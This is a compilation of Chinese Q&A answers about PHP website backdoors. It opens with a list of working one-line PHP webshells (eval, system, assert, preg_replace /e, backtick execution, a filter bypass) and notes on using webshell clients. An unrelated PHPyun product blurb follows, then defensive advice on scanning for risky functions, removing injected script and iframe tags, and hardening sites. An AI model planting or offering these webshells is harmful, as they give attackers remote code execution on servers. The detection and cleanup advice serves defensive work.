1. 一个有意思的 php 一句话后门,怎么破
<?php eval($_POST1);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST1);?>
<?php ($_=@$_GET1).@$_($_POST1)?>
<?php eval_r($_POST1)?>
<?php @eval_r($_POST1)?>//容错代码
<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句
<?$_POST['c']($_POST['cc']);?>
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在
配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O>
<?php echo `$_GET['r']` ?>
//绕过<?限制的一句话
<script language="php">@eval_r($_POST[sb])</script>
2. PHPyun人才系统版权后门怎么清除
设置删除
PHP云人才系统是一个采用PHP和MySQL数据库构建的高效开源的人才与企业求职招、聘解决方案,在尊重版权的前提下能极大的满足站长对于网站程序进行二次开发。PHP云人才系统作为一款拥有自主知识产权的中文人才运营系统,力争为给众多的地方门户、行业人才提供一个易用、功能强大的人才系统。
一、PHP云人才系统产品配置需求:(1)、PHP5、Mysql5、Apache2/IIS6以上环境(2)、可以运行于Windows、Linux、Mac等多种平台(3)、浏览器前台需要用户开启Cookie功能(浏览需要IE6、火狐3.x以上)二、PHP云人才系统产品特点:(1)、PHPOOP思想编写方便维护和升级有很好的安全性(2)、采用PHP模板分离可以方便修改页面和二次开发升级(3)、企业会员和个人会员分别使用独立的管理的权限模式不产生冲突方便管理。
PHP云人才系统产品常见功能:(1)、个人会员拥有单账户多简历,快速根据不同企业投放不同简历(2)、个人会员可以通过创建标准简历和黏贴简历模式快速建立自己的简历信息(3)、个人会员可以通过搜索、收藏、投放等功能来管理个人求职情况(4)、个人会员可以通过申请、推荐模式找到精确的企业(5)、企业会员可以分为、普通会员、季度会员、年会员三类收费和管理(6)、企业会员可以发布不同简历和悬赏简历从而推荐到优先的位置(7)、企业会员可以通过申请广告运营者可以从中获得收入(8)、总后台可以通过审核、配置、预览,查找配合网站运营操作猎头服务(9)Yun(云)人才系统的最大靓点是开启了内容同步和交换功能,方便运营者资源的填充。
3. PHP的网站,怎么扫描出潜藏的一句话木马
查找那些高危函数就行了,比如eval
php后门木马常用的函数大致上可分为四种类型:
1. 执行系统命令: system, passthru, shell_exec, exec, popen,
proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate,
gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once,
file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
4. 怎样检测网站程序后门
放什么地方都可以的,要知道在那里,只有一行行代码地看了,这是唯一办法。
如果有,只能自己修改代码。
如果你是老板,花点钱叫另外一家公司帮你找吧,这些工作很不容易,不会比你写容易多少,所以比较贵。
微软的系统找漏洞也是这样找的,只是他的模块划分得很好,他知道应该在那里找。
5. PHP网站后门怎么清除
一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了
网站挂马是每个网站最头痛的问题,解决办法:1.在程序中很容易找到挂马的代码,直接删除,或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉
听朋友说 SineSafe 不错 你可以去看看。
清马+修补漏洞=彻底解决
所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒
清马
1、找挂马的标签,比如有<script language="javascript" src="网马地址"></script>或<iframe width=420 height=330 frameborder=0
scrolling=auto src=网马地址></iframe>,或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马,一般是JS挂马。
2、找到了恶意代码后,接下来就是清马,如果是网页被挂马,可以用手动清,也可以用批量清,网页清马比较简单,这里就不详细讲,现在着重讲一下SQL数据库清马,用这一句语句“update 表名 set 字段名=replace(字段名,'aaa','')”, 解释一下这一句子的意思:把字段名里的内容包含aaa的替换成空,这样子就可以一个表一个表的批量删除网马。
在你的网站程序或数据库没有备份情况下,可以实行以上两步骤进行清马,如果你的网站程序有备份的话,直接覆盖原来的文件即可。
修补漏洞(修补网站漏洞也就是做一下网站安全。)
1、修改网站后台的用户名和密码及后台的默认路径。
2、更改数据库名,如果是ACCESS数据库,那文件的扩展名最好不要用mdb,改成ASP的,文件名也可以多几个特殊符号。
3、接着检查一下网站有没有注入漏洞或跨站漏洞,如果有的话就相当打上防注入或防跨站补丁。
4、检查一下网站的上传文件,常见了有欺骗上传漏洞,就对相应的代码进行过滤。
5、尽可能不要暴露网站的后台地址,以免被社会工程学猜解出管理用户和密码。
6、写入一些防挂马代码,让框架代码等挂马无效。
7、禁用FSO权限也是一种比较绝的方法。
8、修改网站部分文件夹的读写权限。
9、如果你是自己的服务器,那就不仅要对你的网站程序做一下安全了,而且要对你的服务器做一下安全也是很有必要了!